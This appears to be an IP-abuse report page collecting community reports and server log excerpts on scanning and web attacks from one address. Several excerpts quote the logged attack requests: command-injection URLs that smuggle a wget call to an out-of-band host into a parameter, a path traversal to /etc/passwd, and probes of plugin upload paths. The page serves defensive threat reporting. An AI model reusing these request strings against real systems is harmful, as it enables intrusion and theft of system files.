๐ฉ๐ช
marten_o
2026-10-03 16:13:42
(8 hours ago)
206.189.46.61 - - [03/Oct/2026:18:13:41 +0200] "GET /wp-content/plugins/showbizpro/temp/update_extra ...
show more
206.189.46.61 - - [03/Oct/2026:18:13:41 +0200] "GET /wp-content/plugins/showbizpro/temp/update_extract/Zr1Wz.php HTTP/1.1" 404 17611 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 352 18214
...
show less
Web App Attack
๐ซ๐ท
IRISIO
2026-10-03 15:45:30
(9 hours ago)
scans/SQL injection/spam posts : 2 queries
Web App Attack
SQL Injection
๐ณ๐ฑ
Alt255
2026-10-03 02:56:16
(21 hours ago)
[ti-02ra] Web exploit scanning: 1 suspicious requests detected by fail2ban jail apache-scanner. Exam ...
show more
[ti-02ra] Web exploit scanning: 1 suspicious requests detected by fail2ban jail apache-scanner. Example: 206.189.46.61 - - [03/Oct/2026:04:56:06 +0200] "GET /jmx-console/ HTTP/1.1" 404 106097 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
...
show less
Bad Web Bot
Web App Attack
Anonymous
2026-10-03 00:45:03
(1 day ago)
suspicious request in access.log
Web App Attack
๐บ๐ฆ
URAN Publishing Service
2026-10-03 00:43:03
(1 day ago)
[03/Oct/2026:03:43:03 +0300] -- 206.189.46.61 Ban reason: Scanner [CMS_GENERIC] | Request: POST /wp- ...
show more
[03/Oct/2026:03:43:03 +0300] -- 206.189.46.61 Ban reason: Scanner [CMS_GENERIC] | Request: POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1
show less
Bad Web Bot
Web App Attack
๐บ๐ธ
helios.live
2026-10-02 23:46:42
(1 day ago)
2026/10/02 23:46:38 [error] 3387401#3387401: *5475239 FastCGI sent in stderr: "Primary script unknow ...
show more
2026/10/02 23:46:38 [error] 3387401#3387401: *5475239 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: 206.189.46.61, server: kocerroxy.com, request: "GET /backupmgt/localJob.php?session=fail;wget+http://davn60oanj7ki7sjgvg0ywnxen5ff5mr4.oast.fun; HTTP/1.1", upstream: "fastcgi://unix:/var/run/php/php8.4-fpm-betakocerroxycom.sock:", host: "kocerroxy.com"
206.189.46.61 - - [02/Oct/2026:23:46:38 +0000] "GET /backupmgt/localJob.php?session=fail;wget+http://davn60oanj7ki7sjgvg0ywnxen5ff5mr4.oast.fun; HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:78.0) Gecko/20100101 Firefox/78.0"
2026/10/02 23:46:41 [error] 3387401#3387401: *5474949 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: 206.189.46.61, server: kocerroxy.com, request: "GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://davn60oanj7ki7sjgvg0qdze8fo6fm46o.oast.fun; HTTP/1.1", upstream: "fastcg
...
show less
Web App Attack
๐ซ๐ท
dynamix
2026-10-02 19:08:31
(1 day ago)
Multiple WAF Violations
Web App Attack
๐ฉ๐ช
FD-IX
2026-10-02 13:31:52
(1 day ago)
Fail2Ban: ModSecurity detected a web application attack.
Bad Web Bot
Web App Attack
๐ณ๐ฑ
WeCloudit-Anti-Abuse
2026-10-02 13:00:05
(1 day ago)
This IP was detected by CrowdSec triggering crowdsecurity/CVE-2022-26134
Hacking
Anonymous
2026-10-02 11:05:51
(1 day ago)
Blocked: Reason='Suspicious traffic score=60 (review-based detection)'; Requests=27
Hacking
๐ง๐พ
lns.bz
2026-10-02 10:29:08
(1 day ago)
Too many 404 requests [BY]
Web App Attack
๐ซ๐ท
IRISIO
2026-10-02 08:13:23
(1 day ago)
scans/SQL injection/spam posts : 8 queries
Web App Attack
SQL Injection
๐บ๐ธ
TPI-Abuse
2026-10-02 06:12:35
(1 day ago)
(mod_security) mod_security (id:211190) triggered by 206.189.46.61 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:211190) triggered by 206.189.46.61 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Oct 02 02:12:26.805457 2026] [security2:error] [pid 1773:tid 1773] [client 206.189.46.61:50686] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||justinrudd.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "justinrudd.com"] [uri "/vpn/user/download/client"] [unique_id "ar9LSskkQQ5pv34nrC6iswAAAA8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
nyt
2026-10-02 05:34:53
(1 day ago)
Path Traversal
Web App Attack
๐ญ๐ท
bubausluge
2026-10-02 03:36:30
(1 day ago)
Blocked by https://aegis.hr โ WAF: ModSec rule match - (MITRE T1190), 1 attempts, Period: 2026-10-02 ...
show more
Blocked by https://aegis.hr โ WAF: ModSec rule match - (MITRE T1190), 1 attempts, Period: 2026-10-02 03:08:06 to 2026-10-02 03:08:06
show less
Web App Attack
Hacking